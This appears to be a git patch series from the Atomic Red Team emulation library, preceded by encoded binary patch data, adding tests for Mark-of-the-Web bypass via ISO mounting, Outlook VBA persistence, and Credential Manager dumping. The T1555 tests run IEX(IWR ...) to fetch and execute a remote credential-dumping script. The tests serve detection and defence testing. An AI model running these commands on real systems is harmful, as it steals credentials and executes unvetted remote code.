zrR`lcFgUPsaOLug@)_e}$J;N&k278#gU8c+D6emunHrtAembr;kBisU&ik(3)~t!^ zd8}t#arMw;@qT06-k7&99h=+{@ADFOwXS$%(;S~SzIfKk=9JmF@|a_-`y)O~_cyxc z?Yy2p;?>T*U)U^d&Ip9zW?j5}W%upd;-0+B?#y{w@k$;M_Z-{3zNMY3H^=9<`7ArS zw_bhf>ew^;G1fE>Z&t_tN5|Vm&FRfM;@auW`=+-@%vjB$J>*ebDIVGn>$_J z9JdeuY1(QYb7;q!O_MwKjCG#c+|U^tn;hue*lDiJYt8ud$mG=6=#FOFzUi6Hc(ZxO z3pyh+&8FeeiDqDAW^$@oHxp2Ow5dqcLwrL`5qnXOl|8-?HwKIOgFQ449|>C zPHgRr4d2+kHoa~pj%df8nNBnJz}yx~J4VMwXZ9Uh?Y^jZj*02Xu}*XC)aXoS@ zsx!Q^X&!s!!9O|Vyr$i}IQ|5YsrVVOGi>tmh-=^VrjI;o{nKxmzUBJWw?2GN)BnDg zJm;E6ue$X$q27A@NyoIC)`E7c)xRKao)ka*`ukgRzjmCKC$zoqlxwGkcV9I*vEjy% z&h8vx`wdf*FP@HLJa6_uyC3JOyx#6!{eN%f|6RG`!t>WpPHnic)3xk6cRB+*$MWZL z{EB*3(_Y)X_TYHa7eD{H`|tR=XaDWpau@gC(BuAm{GFa8?g{j`ye@vc zWo^^_cR6q8<l-P>#WR>k{knr+SV$!dwDst$wzIE)#12z zI@X7qnb+$n0enn^<+<#eo z^yy}#`#ihv@NwF)cQAf3AKH6O?463;hhEEI{EBhtN7Jn8{_2y{%yjoo#A_c5ui<7q zZZ|!?B5#@{-Pf}**01mGULTY0ZuWIw(e?3&>{Y&&HQndlJa>OiozFcln78iwW31}V zu_Ycm8UJqYiFs$@T<eT@s}1vS1w+B_4dn`UAVYCJu^J9b9iiWqI2=$eVysWmpt{v z6V?pJ-*7O#V{BhLo?v47;>CNWCZ0S!azkf)czW6R{GVI6Y-Do$$-~p*1ACV*ZjTR7 zjP8oR;ozFXKUzFhyM6GiPzcLxn*i}Z~P*E zeP{XzpLON@v$o@M=y~Foz>z)q%j(9?-p*KiEZ<(dczAkfV(;V&J5!6>dq&rdL_~sd z*YMbMXKtwOlbqk<)y%*2^Y8H5*PMS4AvUZzfBuBxMxM6IQ46$ZKNq`h0tAj;U}5zC!|||}J^P)l^P~TL`4kWK zzUTilQ2Kjw7v-RbF8P^F_uC&2^j`08nzi{_7asP_nz-#kfB*pk1dc}F*eL#vc)+4_ z4zva%De-^K%y#hHtF~<&TyZo{b)W9d`nBWDiTP0<=*_-QWqdFK1PBlyP!>3D?(6^Y zhxIqhqo?_QJh~7dK!5-N0(A@YNB;-9BOYk2$S{bKS18)LVy4P0t5)uA&~ulVT_XfU#0(b9I7b@5FkK+KtUk;pMO?W z_Ww!xU(m8lfB*pk1nLmT{*T8f+5gr0U&o=Ef&c*m1PBxavj6#~8E5}5(Eoy#WdZ~U z5Fk*8K=wcXjKA#vh5BE|p_+mK0RjXF6a=#WyJJuG|04Y_XjvvefB*pkbqHktUlgNc z|DUY?bsVZG2oNAZfIvYY`#%+Xvj0!f|ALlf0t5&UAW(-u_J2A?$^Ng=|2huU6a)wm zAV8oXko}*DJ=y<@^}nEHnE(L-1PIh2kp15iqh$Y|s{eHyswoH%AV7dXK_L6TH}+)z zFVX*kmSqA22oNAphd}oK#W70uf35!4aj2#sK!5-N0tJEW|BbOH`@c^A3tE;55FkK+ zKpg_v|9vq^_Wx4-uj5cnL4W`O0t5;I+5eZsp6vg6{V!-)CP07y0RnXhWdC0pqh$Xt z)BidS)f5B>5FkLHAdvmPDfVRlH|T#s%Q6811PBnQLm>PAvKS@%f4TnGaj2#sK!5-N z0tJEW|I1@f_Wug~FKAgNK!5-N0(A&v|6dWKWdEJZ5Oe`Ac2{oknnbsVZG2oNAZfIvYY`~OX`C;Pui{|j1{2@oJafIuAr+5cC?DB1t3 z^uLZnH3b0z1PBl)2xR|X9ec9>oAtk-Wtjj00t5)uA&~w5<`^aWzeWG+I8;**AV7cs zfr3Ex|65{D_W$ekzo2EA009C72-G2v{eMl2lKtPR|8*RyDF_fCK!89&Ap8HVu_yb# zP5%p8mI)9bK!89U0@?p>i&3)w+x5SWLp22f0t5&UCwiJZG64bv2oR`4Ap8G4F-rFTIr?A6p_+mK0RjXF6a=#W-y3_f z|IgL`f|g|h1PBlyP=`SF|NCN;?Emxhzm7vS1pxvC2oNX;WdCoDJ=y=~>wiJZG64bv z2oR`4Ap8IN7$y6Eo&MKxsHPx5fB*pk1%d4U8)8rPe^~zuT9yeAAV7dX9Rk_^?~hTk z|2y=*jzcvC0RjXF5GV*_|9>F%WdBF>zo2EA009C72-G2v{r|xjCHucq|LZtZQxG6P zfB=DlK=%KQu_ycA(f@*$WdZ~U5Fk*8K=%KKVwCLvF8#0LP)$LA009C73If^xH^rXp z|MmJ`(6UT`009C7>JZ5Ozd1(9{@pn|ALlf0t5&U zAW(-u_W!LhO7{N+`d`PPnt}iU0t5&Y1hW4>9DB0=FVz2nmSqA22oNAphd}oKM`D!h z|Cs*Qaj2#sK!5-N0tJEW|BuF=?Ekp_7ql!BAV7csfjR`T|8I*?vi}qMU&o=Ef&c*m z1PBxavj0C8d$RwN`d`qpOn?9Z0tD(1$o~I$jFSD|t^ai#swoH%AV7dXK_L78_SlpC zf06zdv@8=KK!5;&Is~%+KM|v3|EKi7jzcvC0RjXF5GV*_|9>*}WdEo2zo2EA009C7 z2-G2v{r{;LCHp_4|8*RyDF_fCK!89&Ap8H*u_yb#NB;|2mI)9bK!89U0@?p}#3W)f5B>5FkLHAdvn4`Ph^Fe}(=Rv@8=KK!5;&Is~%+?~75g z|NHg7jzcvC0RjXF5GV*_|KA^bvj4Bt|ALlf0t5&UAW(-u_Wu`Rl5FkLHAdvn4rP!1G|2F+EXjvvefB*pkbqHkte>q0U{=ZiL>o`7(*J^% zWdZ~U5Fk*8K=%LFVwCLvck6#0hiVD}1PBlyP!P!e|9b4n{(q1D7ql!BAV7csfjR`T z|DTLevj5+!|8*RyDF_fCK!89&Ap8Ftu_ycgefnR}vP^&g0RjZ-5Xk<2Dn`lv->m<2 z9I7b@5FkK+KtUk;|C_NV`~Q0VFKAgNK!5-N0(A&v|9>k+$^O4V|LZtZQxG6PfB=Dl zK=%LBu_ycg{rX?fvP^&g0RjZ-5Xk=jc8rq!{{j84<4{dOfB*pk1PTJ#|KEu{+5aEZ z|ALlf0t5&UAW(-u_WyTdlo`(049I7b@5FkK+KtUk;e{1Z?{{Mvj7ql!BAV7csfjR`T|9=^y zWdDCs|LZtZQxG6PfB=DlK=%KyVo&z}r}V#|Wtjj00t5)uA&~w5>lh{b|I_+k$Dx{n z009C72owae|9=yEvj6YU|ALlf0t5&UAW(-u_W!mRCHwzQ{jcLtO+kPF0RjXH0@?r1 z#-8l|&**PAw=qig|6TfD$Dx{n009C72owae|9=;Ivj6Ya|ALlf z0t5&UAW(-u_W$o=lVF-FY6=1b2oNAp5Xk<2F7{;q-=qHpEz1N55FkLH4uS0d zKg1~6|M%*D9fxWP0t5&UAW#s<{{Lg_$^QSG{ui_?6Cgl<0D(FLvj6`Sqh$YoUjOSj zR8tTjK!5;&fJZ5Oe?CUZ{=Z-U>o`{ui_?6Cgl<0D(FLvj6`Qqh$X-p#OCoswoH%AV7dXK_L78udyfl|3UpP zXjvvefB*pkbqHkt|1Czz{(ngS>o`JZ5O|7VPn{r`ym z*Kw$(AV7cs0Rjbq?Einop6vfe^}nEHnE(L-1PIh2kp2Jf7$y7vOZs2Op_+mK0RjXF z6a=#WUyME3|6kVsf|g|h1PBlyP=`SF|9@hX?ElB~zm7vS1pxvC2oNX;WdFYud$Ru@ z*Z+c+WdZ~U5Fk*8K=%KCW0dUwujqdrhiVD}1PBlyP!P!ee>wJK|9@5g3tE;55FkK+ zKpg_v|J!4f?Efe9zm7vS1pxvC2oNX;WdHM${r@%nFKAgNK!5-N0(A&v|1@{{=0}1PBlyK%fqRtp71FO7{OZ^uLZnH3b0z1PBl) z2xR{k#GdT`r}V#|Wtjj00t5)uA&~t)Hb%+*|EB)eaj2#sK!5-N0tJEW|H9al{r@ff zFKAgNK!5-N0(A&v|Bs7Nvj3mf|2huU6a)wmAV8oXkp1tEJ=y=?*8hT*WdZ~U5Fk*8 zK=%Lm7$y7vJNjS8p_+mK0RjXF6a=#WC&ZrY|L^L5LCZ1$0t5&Us6!z8|Bx6Z`~Q3T zU&o=Ef&c*m1PBxavi}c_J=y=?*Z+c+WdZ~U5Fk*8K=%K{7$y7v2l`*fp_+mK0RjXF z6a=#WC&ixZ{~zjqLCZ1$0t5&Us6!z8|F9S(`~MmJuj5cnL4W`O0t5;I+5bhcC;R_L z`d`qpOn?9Z0tD(1$o@Y(M#=vFvHsU_sHPx5fB*pk1%d4U*TtUf|DWi8LCZ1$0t5&U zs6!z8e{zhH{r^+_uj5cnL4W`O0t5;I+5bnxp6vgh>3>1XG64bv2oR`4Ap8Hw7$y7v z=lWmAp_+mK0RjXF6a=#Wr^KG@|6k~TLCZ1$0t5&Us6!z8|EL%x`+uwc*Kw$(AV7cs z0Rjbq?Ek5;C;R`G`d`qpOn?9Z0tD(1$o@Y%M#=vFmHyXpsHPx5fB*pk1%d4UV`5MC z|F8AGpko`3=UG_YojKfB=E&1hW5E#8lb;hv|QH=W8GW z1PBly&`Tiue`PFW{}<_hFCzC5AV7csf$9XZ|3fiV_W$AfU)}i{hyVcs1PJsJ$o@Yq z7P9|er~kc(+(&=_0RjZ76UhEQJ*LY3pRE7Yov(oi5FkK+Kreyp|HfFz{y#$hdl9*h z009C72vjGK{ofQ*W&a3?5xI{50RjXFR40)AAC0N9|I78iy7M&<0RjXF5a=b4{eM9$WdB#_ ze=j2U5gwk6UYajvy2oNC9OCbBdHx{!0Pu2fkMD8O%fB*pk d)d^((UmR0q|1Z)1>dx0d1PBlyK%kev{{g8hV Date: Thu, 10 Jun 2021 03:44:49 +0000 Subject: [PATCH 22/84] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1553.005/T1553.005.yaml | 1 + atomics/used_guids.txt | 1 + 2 files changed, 2 insertions(+) diff --git a/atomics/T1553.005/T1553.005.yaml b/atomics/T1553.005/T1553.005.yaml index 63f1ffe5..e31b4c2a 100644 --- a/atomics/T1553.005/T1553.005.yaml +++ b/atomics/T1553.005/T1553.005.yaml @@ -29,6 +29,7 @@ atomic_tests: name: powershell - name: Mount an ISO image and run executable from the ISO + auto_generated_guid: 42f22b00-0242-4afc-a61b-0da05041f9cc description: |- Mounts an ISO image downloaded from internet to evade Mark-of-the-Web and run hello.exe executable from the ISO. Upon successful execution, powershell will download the .iso from the Atomic Red Team repo, mount the image, and run the executable from the ISO image that will open command prompt echoing "Hello, World!". diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 3e4f1628..f4ac635b 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -711,3 +711,4 @@ c33f3d80-5f04-419b-a13a-854d1cbdbf3a da4f751a-020b-40d7-b9ff-d433b7799803 c35ac4a8-19de-43af-b9f8-755da7e89c89 002cca30-4778-4891-878a-aaffcfa502fa +42f22b00-0242-4afc-a61b-0da05041f9cc From 733963824bcca645eed9d18002db10671d2eb12c Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Thu, 10 Jun 2021 03:44:56 +0000 Subject: [PATCH 23/84] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/windows-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 1 + .../Indexes/Indexes-Markdown/windows-index.md | 1 + atomics/Indexes/index.yaml | 42 ++++++++++++- atomics/T1553.005/T1553.005.md | 59 ++++++++++++++++++- 6 files changed, 99 insertions(+), 6 deletions(-) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 6e8aae4b..958c5b89 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -355,6 +355,7 @@ defense-evasion,T1078.003,Local Accounts,1,Create local account with admin privi defense-evasion,T1127.001,MSBuild,1,MSBuild Bypass Using Inline Tasks (C#),58742c0f-cb01-44cd-a60b-fb26e8871c93,command_prompt defense-evasion,T1127.001,MSBuild,2,MSBuild Bypass Using Inline Tasks (VB),ab042179-c0c5-402f-9bc8-42741f5ce359,command_prompt defense-evasion,T1553.005,Mark-of-the-Web Bypass,1,Mount ISO image,002cca30-4778-4891-878a-aaffcfa502fa,powershell +defense-evasion,T1553.005,Mark-of-the-Web Bypass,2,Mount an ISO image and run executable from the ISO,42f22b00-0242-4afc-a61b-0da05041f9cc,powershell defense-evasion,T1036.004,Masquerade Task or Service,1,Creating W32Time similar named service using schtasks,f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9,command_prompt defense-evasion,T1036.004,Masquerade Task or Service,2,Creating W32Time similar named service using sc,b721c6ef-472c-4263-a0d9-37f1f4ecff66,command_prompt defense-evasion,T1036,Masquerading,1,System File Copied to Unusual Location,51005ac7-52e2-45e0-bdab-d17c6d4916cd,command_prompt diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 690fbfdb..4835de52 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -234,6 +234,7 @@ defense-evasion,T1078.003,Local Accounts,1,Create local account with admin privi defense-evasion,T1127.001,MSBuild,1,MSBuild Bypass Using Inline Tasks (C#),58742c0f-cb01-44cd-a60b-fb26e8871c93,command_prompt defense-evasion,T1127.001,MSBuild,2,MSBuild Bypass Using Inline Tasks (VB),ab042179-c0c5-402f-9bc8-42741f5ce359,command_prompt defense-evasion,T1553.005,Mark-of-the-Web Bypass,1,Mount ISO image,002cca30-4778-4891-878a-aaffcfa502fa,powershell +defense-evasion,T1553.005,Mark-of-the-Web Bypass,2,Mount an ISO image and run executable from the ISO,42f22b00-0242-4afc-a61b-0da05041f9cc,powershell defense-evasion,T1036.004,Masquerade Task or Service,1,Creating W32Time similar named service using schtasks,f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9,command_prompt defense-evasion,T1036.004,Masquerade Task or Service,2,Creating W32Time similar named service using sc,b721c6ef-472c-4263-a0d9-37f1f4ecff66,command_prompt defense-evasion,T1036,Masquerading,1,System File Copied to Unusual Location,51005ac7-52e2-45e0-bdab-d17c6d4916cd,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index bfb8c069..c55b55ee 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -624,6 +624,7 @@ - T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1553.005 Mark-of-the-Web Bypass](../../T1553.005/T1553.005.md) - Atomic Test #1: Mount ISO image [windows] + - Atomic Test #2: Mount an ISO image and run executable from the ISO [windows] - [T1036.004 Masquerade Task or Service](../../T1036.004/T1036.004.md) - Atomic Test #1: Creating W32Time similar named service using schtasks [windows] - Atomic Test #2: Creating W32Time similar named service using sc [windows] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index e53dfb2f..eeb67747 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -441,6 +441,7 @@ - T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1553.005 Mark-of-the-Web Bypass](../../T1553.005/T1553.005.md) - Atomic Test #1: Mount ISO image [windows] + - Atomic Test #2: Mount an ISO image and run executable from the ISO [windows] - [T1036.004 Masquerade Task or Service](../../T1036.004/T1036.004.md) - Atomic Test #1: Creating W32Time similar named service using schtasks [windows] - Atomic Test #2: Creating W32Time similar named service using sc [windows] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index f0f057a6..382838e1 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -27232,7 +27232,7 @@ defense-evasion: path_of_iso: description: Path to ISO file type: path - default: PathToAtomicsFolder\T1553.005\src\T1553.005.iso + default: PathToAtomicsFolder\T1553.005\bin\T1553.005.iso dependency_executor_name: powershell dependencies: - description: 'T1553.005.iso must exist on disk at specified location (#{path_of_iso}) @@ -27243,15 +27243,51 @@ defense-evasion: ' get_prereq_command: | New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null - Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/src/T1553.005.iso -OutFile "#{path_of_iso}" + Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/T1553.005.iso -OutFile "#{path_of_iso}" executor: command: 'Mount-DiskImage -ImagePath "#{path_of_iso}" ' - cleanup_command: 'Dismount-DiskImage -ImagePath "#{path_of_iso}" + cleanup_command: 'Dismount-DiskImage -ImagePath "#{path_of_iso}" | Out-Null ' name: powershell + - name: Mount an ISO image and run executable from the ISO + auto_generated_guid: 42f22b00-0242-4afc-a61b-0da05041f9cc + description: "Mounts an ISO image downloaded from internet to evade Mark-of-the-Web + and run hello.exe executable from the ISO. \nUpon successful execution, powershell + will download the .iso from the Atomic Red Team repo, mount the image, and + run the executable from the ISO image that will open command prompt echoing + \"Hello, World!\". \nISO provided by:https://twitter.com/mattifestation/status/1398323532988399620 + Reference:https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/, + \ " + supported_platforms: + - windows + input_arguments: + path_of_iso: + description: Path to ISO file + type: path + default: PathToAtomicsFolder\T1553.005\bin\FeelTheBurn.iso + dependency_executor_name: powershell + dependencies: + - description: 'FeelTheBurn.iso must exist on disk at specified location (#{path_of_iso}) + +' + prereq_command: 'if (Test-Path #{path_of_iso}) {exit 0} else {exit 1} + +' + get_prereq_command: | + New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null + Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/FeelTheBurn.iso -OutFile "#{path_of_iso}" + executor: + command: | + $keep = Mount-DiskImage -ImagePath "#{path_of_iso}" -StorageType ISO -Access ReadOnly + $driveLetter = ($keep | Get-Volume).DriveLetter + invoke-item "$($driveLetter):\hello.exe" + cleanup_command: | + Dismount-DiskImage -ImagePath "#{path_of_iso}" | Out-Null + Stop-process -name "hello" -Force -ErrorAction ignore + name: powershell T1036.004: technique: external_references: diff --git a/atomics/T1553.005/T1553.005.md b/atomics/T1553.005/T1553.005.md index c7f2e10e..f80a754a 100644 --- a/atomics/T1553.005/T1553.005.md +++ b/atomics/T1553.005/T1553.005.md @@ -8,6 +8,8 @@ Adversaries may abuse container files such as compressed/archive (.arj, .gzip) a - [Atomic Test #1 - Mount ISO image](#atomic-test-1---mount-iso-image) +- [Atomic Test #2 - Mount an ISO image and run executable from the ISO](#atomic-test-2---mount-an-iso-image-and-run-executable-from-the-iso) +
@@ -22,7 +24,7 @@ Mounts ISO image downloaded from internet to evade Mark-of-the-Web. Upon success #### Inputs: | Name | Description | Type | Default Value | |------|-------------|------|---------------| -| path_of_iso | Path to ISO file | path | PathToAtomicsFolder\T1553.005\src\T1553.005.iso| +| path_of_iso | Path to ISO file | path | PathToAtomicsFolder\T1553.005\bin\T1553.005.iso| #### Attack Commands: Run with `powershell`! @@ -34,7 +36,7 @@ Mount-DiskImage -ImagePath "#{path_of_iso}" #### Cleanup Commands: ```powershell -Dismount-DiskImage -ImagePath "#{path_of_iso}" +Dismount-DiskImage -ImagePath "#{path_of_iso}" | Out-Null ``` @@ -48,7 +50,58 @@ if (Test-Path #{path_of_iso}) {exit 0} else {exit 1} ##### Get Prereq Commands: ```powershell New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null -Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/src/T1553.005.iso -OutFile "#{path_of_iso}" +Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/T1553.005.iso -OutFile "#{path_of_iso}" +``` + + + + +
+
+ +## Atomic Test #2 - Mount an ISO image and run executable from the ISO +Mounts an ISO image downloaded from internet to evade Mark-of-the-Web and run hello.exe executable from the ISO. +Upon successful execution, powershell will download the .iso from the Atomic Red Team repo, mount the image, and run the executable from the ISO image that will open command prompt echoing "Hello, World!". +ISO provided by:https://twitter.com/mattifestation/status/1398323532988399620 Reference:https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/, + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| path_of_iso | Path to ISO file | path | PathToAtomicsFolder\T1553.005\bin\FeelTheBurn.iso| + + +#### Attack Commands: Run with `powershell`! + + +```powershell +$keep = Mount-DiskImage -ImagePath "#{path_of_iso}" -StorageType ISO -Access ReadOnly +$driveLetter = ($keep | Get-Volume).DriveLetter +invoke-item "$($driveLetter):\hello.exe" +``` + +#### Cleanup Commands: +```powershell +Dismount-DiskImage -ImagePath "#{path_of_iso}" | Out-Null +Stop-process -name "hello" -Force -ErrorAction ignore +``` + + + +#### Dependencies: Run with `powershell`! +##### Description: FeelTheBurn.iso must exist on disk at specified location (#{path_of_iso}) +##### Check Prereq Commands: +```powershell +if (Test-Path #{path_of_iso}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +```powershell +New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null +Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/FeelTheBurn.iso -OutFile "#{path_of_iso}" ``` From 54486ba7a502f99d8e5c4dc002b703d8dd399f6c Mon Sep 17 00:00:00 2001 From: Carrie Roberts Date: Wed, 9 Jun 2021 23:38:58 -0600 Subject: [PATCH 24/84] force the reg add and fix error where otm wasn't being created (#1511) Co-authored-by: Keith McCammon --- atomics/T1137/T1137.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/atomics/T1137/T1137.yaml b/atomics/T1137/T1137.yaml index 58a9a9e6..138d40bc 100644 --- a/atomics/T1137/T1137.yaml +++ b/atomics/T1137/T1137.yaml @@ -13,8 +13,8 @@ atomic_tests: - windows executor: command: | - reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /t REG_DWORD /d 4 - if not exist %APPDATA%\Microsoft\Outlook ( md %APPDATA%\Microsoft\Outlook\ ) + reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /t REG_DWORD /d 4 /f + mkdir %APPDATA%\Microsoft\Outlook\ >nul 2>&1 echo "Atomic Red Team TEST" > %APPDATA%\Microsoft\Outlook\VbaProject.OTM cleanup_command: | reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /f From 2b3f9444ae06dfab3b109162422d2a651b37863c Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Thu, 10 Jun 2021 05:39:34 +0000 Subject: [PATCH 25/84] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 4 ++-- atomics/T1137/T1137.md | 4 ++-- 2 files changed, 4 insertions(+), 4 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 382838e1..4ebeaa43 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -41779,8 +41779,8 @@ persistence: - windows executor: command: | - reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /t REG_DWORD /d 4 - if not exist %APPDATA%\Microsoft\Outlook ( md %APPDATA%\Microsoft\Outlook\ ) + reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /t REG_DWORD /d 4 /f + mkdir %APPDATA%\Microsoft\Outlook\ >nul 2>&1 echo "Atomic Red Team TEST" > %APPDATA%\Microsoft\Outlook\VbaProject.OTM cleanup_command: | reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /f diff --git a/atomics/T1137/T1137.md b/atomics/T1137/T1137.md index 6d0f575f..a7660ba0 100644 --- a/atomics/T1137/T1137.md +++ b/atomics/T1137/T1137.md @@ -28,8 +28,8 @@ Too achieve this two things must happened on the syste ```cmd -reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /t REG_DWORD /d 4 -if not exist %APPDATA%\Microsoft\Outlook ( md %APPDATA%\Microsoft\Outlook\ ) +reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /t REG_DWORD /d 4 /f +mkdir %APPDATA%\Microsoft\Outlook\ >nul 2>&1 echo "Atomic Red Team TEST" > %APPDATA%\Microsoft\Outlook\VbaProject.OTM ``` From 1c799637ce172ab2e3050eed39eaa943f2a6807b Mon Sep 17 00:00:00 2001 From: Suman Kar <43452298+skar4444@users.noreply.github.com> Date: Thu, 10 Jun 2021 22:48:12 +0530 Subject: [PATCH 26/84] =?UTF-8?q?New=20Dump=20credentials=20from=20Windows?= =?UTF-8?q?=20Credential=20Manager=20With=20PowerShell=20=E2=80=A6=20(#150?= =?UTF-8?q?8)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * New Dump credentials from Windows Credential Manager With PowerShell [windows Credentials & web Credentials] * Update T1555.yaml * Update T1555.yaml * use permanent github link for script * use github permanent link for script Co-authored-by: Carrie Roberts --- atomics/T1555/T1555.yaml | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) diff --git a/atomics/T1555/T1555.yaml b/atomics/T1555/T1555.yaml index 898b959a..1aa2eeed 100644 --- a/atomics/T1555/T1555.yaml +++ b/atomics/T1555/T1555.yaml @@ -28,3 +28,21 @@ atomic_tests: cleanup_command: | Remove-Item "$env:TEMP\windows-credentials.txt" -ErrorAction Ignore name: powershell +- name: Dump credentials from Windows Credential Manager With PowerShell [windows Credentials] + description: This module will extract the credentials from Windows Credential Manager + supported_platforms: + - windows + executor: + name: powershell + elevation_required: false + command: | + IEX (IWR 'https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1' -UseBasicParsing); Get-PasswordVaultCredentials -Force +- name: Dump credentials from Windows Credential Manager With PowerShell [web Credentials] + description: This module will extract the credentials from Windows Credential Manager + supported_platforms: + - windows + executor: + name: powershell + elevation_required: false + command: | + IEX (IWR 'https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1' -UseBasicParsing); Get-CredManCreds -Force From f12343356726aacd67faffb7222e270ebc3ddea6 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Thu, 10 Jun 2021 17:18:39 +0000 Subject: [PATCH 27/84] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1555/T1555.yaml | 2 ++ atomics/used_guids.txt | 2 ++ 2 files changed, 4 insertions(+) diff --git a/atomics/T1555/T1555.yaml b/atomics/T1555/T1555.yaml index 1aa2eeed..e5e80e64 100644 --- a/atomics/T1555/T1555.yaml +++ b/atomics/T1555/T1555.yaml @@ -29,6 +29,7 @@ atomic_tests: Remove-Item "$env:TEMP\windows-credentials.txt" -ErrorAction Ignore name: powershell - name: Dump credentials from Windows Credential Manager With PowerShell [windows Credentials] + auto_generated_guid: c89becbe-1758-4e7d-a0f4-97d2188a23e3 description: This module will extract the credentials from Windows Credential Manager supported_platforms: - windows @@ -38,6 +39,7 @@ atomic_tests: command: | IEX (IWR 'https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1' -UseBasicParsing); Get-PasswordVaultCredentials -Force - name: Dump credentials from Windows Credential Manager With PowerShell [web Credentials] + auto_generated_guid: 8fd5a296-6772-4766-9991-ff4e92af7240 description: This module will extract the credentials from Windows Credential Manager supported_platforms: - windows diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index f4ac635b..e3e4f0c6 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -712,3 +712,5 @@ da4f751a-020b-40d7-b9ff-d433b7799803 c35ac4a8-19de-43af-b9f8-755da7e89c89 002cca30-4778-4891-878a-aaffcfa502fa 42f22b00-0242-4afc-a61b-0da05041f9cc +c89becbe-1758-4e7d-a0f4-97d2188a23e3 +8fd5a296-6772-4766-9991-ff4e92af7240 From b97bfd31e604237eaaf8ef147dc634ba36eb8744 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Thu, 10 Jun 2021 17:18:45 +0000 Subject: [PATCH 28/84] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 2 + atomics/Indexes/Indexes-CSV/windows-index.csv | 2 + atomics/Indexes/Indexes-Markdown/index.md | 2 + .../Indexes/Indexes-Markdown/windows-index.md | 2 + atomics/Indexes/index.yaml | 26 ++++++++++ atomics/T1555/T1555.md | 52 +++++++++++++++++++ 6 files changed, 86 insertions(+) diff --git 